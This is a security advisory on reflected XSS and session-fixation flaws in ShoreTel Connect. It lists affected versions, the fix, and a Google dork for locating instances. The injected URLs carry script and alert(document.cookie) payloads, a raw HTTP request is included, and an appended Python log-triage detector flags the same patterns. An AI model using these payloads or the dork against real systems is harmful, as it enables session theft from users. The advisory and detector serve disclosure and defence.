Vulnerabilities/Shoretel Connect Multiple Vulnerability
| # Exploit Title: Reflected XSS and Session Fixation | |
| # Google Dork: inurl:/signin.php?ret= | |
| # Date: 14/06/2017 | |
| # Author: Ramikan | |
| # Vendor Homepage: https://www.shoretel.com/ | |
| # Software Link: https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview | |
| # Version: Tested on 18.62.2000.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0; other versions may also be affected. | |
| # Tested on: Mozilla Firefox 53.0.3 (32 bit) Browser | |
| # CVE: CVE-2019-9591, CVE-2019-9592, CVE-2019-9593 | |
| # Category: Web Apps | |
| Vulnerability: Reflected XSS and Session Fixation | |
| Vendor Web site: http://support.shoretel.com | |
| Versions tested: 18.62.2000.0, 19.45.1602.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0 | |
| Google dork: inurl:/signin.php?ret= | |
| Solution: Update to 19.49.1500.0 | |
| Vulnerability 1: Reflected XSS & Form Action Hijacking | |
| Affected URL: | |
| /signin.php?ret=http%3A%2F%2Fdomainname.com%2F%3Fpage%3DACCOUNT&&brand=4429769&brandUrl=https://domainname.com/site/l8o5g--><script>alert(1)</script>y0gpy&page=ACCOUNT | |
| Affected Parameter: brandUrl | |
| Vulnerability 2: Reflected XSS | |
| Affected URL: | |
| /index.php/" onmouseover%3dalert(document.cookie) style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b | |
| Affected Parameter: url | |
| Affected Version: 19.45.1602.0 | |
| Vulnerability 3: Reflected XSS | |
| /site/?page=jtqv8"><script>alert(1)</script>bi14e | |
| Affected Parameter: page | |
| Affected Version: 18.82.2000.0 | |
| GET /site/?page=jtqv8"><script>alert(1)</script>bi14e HTTP/1.1 | |
| Host: hostname | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-GB,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Referer: http://hostname.com/signin.php | |
| Cookie: PHPSESSID=2229e3450f16fcfb2531e2b9d01b9fec; chkcookie=1508247199505 | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 | |
| Cache-Control: max-age=0 | |
| Vulnerability 4: Session Hijacking | |
| By exploiting the above XSS vulnerabilities, an attacker can obtain the valid session cookies of an authenticated user and hijack the session. | |
| Both cookies, PHPSESSID and chkcookie, are insecure. | |
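
A log-triage check for the request patterns listed above, added here as an example and not part of the original advisory: it URL-decodes each request target and flags HTML metacharacters in the `brandUrl` and `page` parameters and in the path after `/index.php/`. The request lines are constructed from the advisory's URLs, and the function names are illustrative.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Characters that let a reflected value break out of an HTML attribute or tag.
HTML_META = re.compile(r'[<>"]')

# Path prefix -> query parameter named as affected in the advisory.
WATCHED_PARAMS = {"/signin.php": "brandUrl", "/site/": "page"}
INDEX_PREFIX = "/index.php/"  # Vulnerability 2 reflects the path after this prefix

def suspicious(target: str) -> list[str]:
    """Return which advisory pattern(s) a request target matches, if any."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    reasons = []
    if path.startswith(INDEX_PREFIX) and HTML_META.search(path[len(INDEX_PREFIX):]):
        reasons.append("path:/index.php/")
    query = parse_qs(parts.query, keep_blank_values=True)  # values come back decoded
    for prefix, param in WATCHED_PARAMS.items():
        if path.startswith(prefix) and any(
            HTML_META.search(value) for value in query.get(param, [])
        ):
            reasons.append(f"param:{param}")
    return reasons

def scan(request_lines):
    """Map each flagged request target to the reasons it was flagged."""
    hits = {}
    for line in request_lines:
        _method, target, _proto = line.split(" ", 2)
        reasons = suspicious(target)
        if reasons:
            hits[target] = reasons
    return hits

# Constructed, percent-encoded request lines modelled on the advisory's URLs.
SAMPLE_REQUESTS = [
    "GET /signin.php?brand=4429769&brandUrl=https://domainname.com/site/&page=ACCOUNT HTTP/1.1",
    "GET /signin.php?brand=4429769&brandUrl=https://domainname.com/site/l8o5g--%3E%3Cscript%3Ealert(1)%3C/script%3Ey0gpy&page=ACCOUNT HTTP/1.1",
    "GET /index.php/%22%20onmouseover%3dalert(document.cookie) HTTP/1.1",
    "GET /site/?page=jtqv8%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebi14e HTTP/1.1",
    "GET /site/?page=ACCOUNT HTTP/1.1",
]

if __name__ == "__main__":
    for target, reasons in scan(SAMPLE_REQUESTS).items():
        print(reasons, target)
```

Matches are triage leads for review on hosts still running a version below the fixed 19.49.1500.0, not proof that a payload executed.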